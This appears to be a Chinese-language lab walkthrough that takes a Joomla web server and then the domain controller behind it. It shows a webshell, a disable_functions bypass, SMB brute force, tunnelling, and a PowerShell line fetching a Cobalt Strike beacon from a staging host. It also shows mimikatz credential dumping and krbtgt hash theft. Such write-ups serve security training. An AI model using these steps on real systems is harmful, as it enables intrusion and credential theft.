網絡拓撲
web階段
1.掃描DMZ機器端口
2.進行ssh和3306爆破無果后訪問web服務
3.已知目標是Joomla,掃描目錄
4.有用的目錄分別為1.php
5.configuration.php~中泄露了數據庫密碼
6.administrator為后臺登錄地址
7.直接連接mysql
8.找到管理員表,密碼加密了
9.百度joomla密碼的加密方式以及重置方式,用下面的方式添加新的管理員用戶
https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
10.重置密碼后登錄后臺
11.搜索相關漏洞,用這個后臺RCE
12.訪問后并沒有回顯
13.查看exp是怎么寫的,看著沒什么問題,不知道為什么不顯示
14.修改一下直接寫一個一句話馬
15.修改一下直接寫一個一句話馬
16.連接上蟻劍,進入命令行發現不能執行
17.這里看網上說是被disable_function限制了,在之前的phpinfo的信息中也可以看到disable_function
disable_function就是在web服務中禁止執行一些高危函數,像一般的webshell管理工具就是默認用exec、system這種php函數來執行系統命令的,然而在此處就被disable_function限制了
18.使用蟻劍的插件進行繞過
19.成功執行命令
內網
1.這里看了一下ip,發現只有一個內網ip并沒有公網ip,之前那個公網ip應該是一個負載均衡服務器使用了nginx反向代理
2.翻出來的賬號密碼
3.通過此賬號密碼登錄公網服務器,也就是那臺負載的ssh
4.上傳fscan大致掃描一下內網
5.搭建frp做內網穿透
服務端
客戶端
6.因為之前fscan看到192.168.93.20開啟了80端口,所以這里掃描一下
7.發現是一個sqlserver的什么登錄框
8.嘗試對sqlserver進行爆破但是無果
9.對SMB進行爆破,這里爆破成功
10.通過wmiexec進行連接
11.連接成功后查看一下大致的信息,判斷是否可出網
12.連接成功后查看一下大致的信息,判斷是否可出網
13.因為目標不可出網,所以這里打算使用cs的正向代理木馬去控制目標主機
之前搭建了內網隧道,現在我本地的機器可以訪問192.168.93這個網段,所以說要通過正向代理讓192.168.93.20這個機器上線cs的話可以先讓本地機器上線,或者也可以讓192.168.93.100那臺ubantu上線去正向連接192.168.93.20,因為cs生成linux的木馬要用插件所以這里直接就讓我本地的機器上線了,再通過隧道去正向連接192.168.93.20受害機器
14.創建正向監聽
15.創建木馬綁定這個正向監聽器
16.將因為192.168.93.20這個機器不出網,所以把木馬上傳到192.168.93.100這臺ubantu上,開啟http服務
17.這邊192.168.93.20使用wmiexe創建的會話用過powershell去下載192.168.93.100上的木馬
powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.100:8888/beacon.exe','C:\beacon.exe')
18.下載成功后執行,進行監聽
19.這里使用我本地機器會話的beacon去直接連接正向代理木馬
20.機器192.168.93.20成功上線
21.這里想直接使用mimikatz抓取密碼,但是不知道為什么執行出錯了
22.使用cs將本地的mimikatz上傳到192.168.93.20這臺機器上
23.運行mimikatz抓取本地密碼并將結果保存
mimikazi.exe log privilege::debug sekurlsa::logonpasswords
24.對運行的結果進行下載
25.這里可以看到抓取到了WIN-8GA56TNV3MV這臺機器的管理員用戶密碼
26.對比一下之前fscan掃描的結果,這臺機器的ip是192.168.93.10,并且這臺機器是域控
27.直接通過psexec明文密碼去連接,成功獲取到會話
28.繼續在192.168.93.100啟動web
29.這里我想讓它和之前的機器一樣直接正向連接上線cs,但是不知道為什么一直不成功
30.既然上線不了cs那就直接通過powershell下載mimikatz到本地吧
31.既然這臺機器是域控,那肯定要抓krbtgt的hash
32.整個過程成功拿下了域控并抓了krbtgt的hash,此時還有一個192.168.93.30機器沒有上線,接下來的話就是做黃金票據然后登錄這臺機器了,這里就不做演示了
)
